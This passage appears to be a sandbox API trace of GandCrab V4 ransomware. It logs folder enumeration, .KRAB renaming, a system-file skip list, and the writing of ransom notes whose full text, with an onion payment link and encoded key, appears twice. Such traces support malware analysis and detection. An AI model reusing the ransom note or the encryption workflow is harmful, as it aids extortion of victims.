hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.338] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0091.338] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0091.338] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="My Shapes" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes" [0091.338] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\" [0091.338] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0091.338] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.338] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.339] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.339] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.339] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.340] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.341] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\\\KRAB-DECRYPT.txt") returned 59 [0091.341] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my shapes\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.391] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0091.391] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0091.392] CloseHandle (hObject=0x434) returned 1 [0091.392] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.392] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.393] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x26, wMilliseconds=0x24c)) [0091.393] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.393] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.393] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.393] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a08d2ca4dee3d.lock") returned 65 [0091.393] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my shapes\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0091.394] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.394] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.394] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\") returned 42 [0091.395] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*" [0091.395] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd3e0 [0091.395] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.395] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.395] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.395] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.395] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.395] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0091.395] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0091.395] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a08d2ca4dee3d.lock" [0091.395] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.395] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 70 [0091.395] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\d2ca4a08d2ca4dee3d.lock") returned 65 [0091.395] lstrlenW (lpString=".lock") returned 5 [0091.396] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.397] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0091.397] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.400] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.400] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.400] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0091.400] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0091.400] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini" [0091.400] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.400] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini.KRAB") returned 58 [0091.400] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned 53 [0091.401] lstrlenW (lpString=".ini") returned 4 [0091.401] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.401] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0091.401] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned 53 [0091.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\desktop.ini") returned 53 [0091.402] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0091.402] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.402] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.402] lstrcmpW (lpString1="Favorites.vssx", lpString2=".") returned 1 [0091.402] lstrcmpW (lpString1="Favorites.vssx", lpString2="..") returned 1 [0091.402] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="Favorites.vssx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx" [0091.402] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.403] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx.KRAB") returned 61 [0091.403] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned 56 [0091.403] lstrlenW (lpString=".vssx") returned 5 [0091.403] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.403] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".vssx ") returned 6 [0091.403] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.404] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned 56 [0091.404] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\Favorites.vssx") returned 56 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="desktop.ini") returned 1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="autorun.inf") returned 1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="ntuser.dat") returned -1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="iconcache.db") returned -1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="bootsect.bak") returned 1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="boot.ini") returned 1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="ntuser.dat.log") returned -1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="thumbs.db") returned -1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="KRAB-DECRYPT.html") returned -1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="KRAB-DECRYPT.txt") returned -1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="ntldr") returned -1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="NTDETECT.COM") returned -1 [0091.404] lstrcmpiW (lpString1="Favorites.vssx", lpString2="Bootfont.bin") returned 1 [0091.404] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.404] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.405] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0091.405] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0091.405] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\KRAB-DECRYPT.txt" [0091.405] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.405] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\KRAB-DECRYPT.txt.KRAB") returned 63 [0091.405] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\KRAB-DECRYPT.txt") returned 58 [0091.405] lstrlenW (lpString=".txt") returned 4 [0091.405] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.405] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0091.405] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.406] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\KRAB-DECRYPT.txt") returned 58 [0091.406] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\KRAB-DECRYPT.txt") returned 58 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0091.406] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0091.406] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.407] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0091.407] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0091.407] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0091.407] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\", lpString2="_private" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private" [0091.407] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\" [0091.407] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0091.407] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.407] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.407] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.407] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.407] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.408] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.408] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\\\KRAB-DECRYPT.txt") returned 68 [0091.408] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my shapes\\_private\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0091.409] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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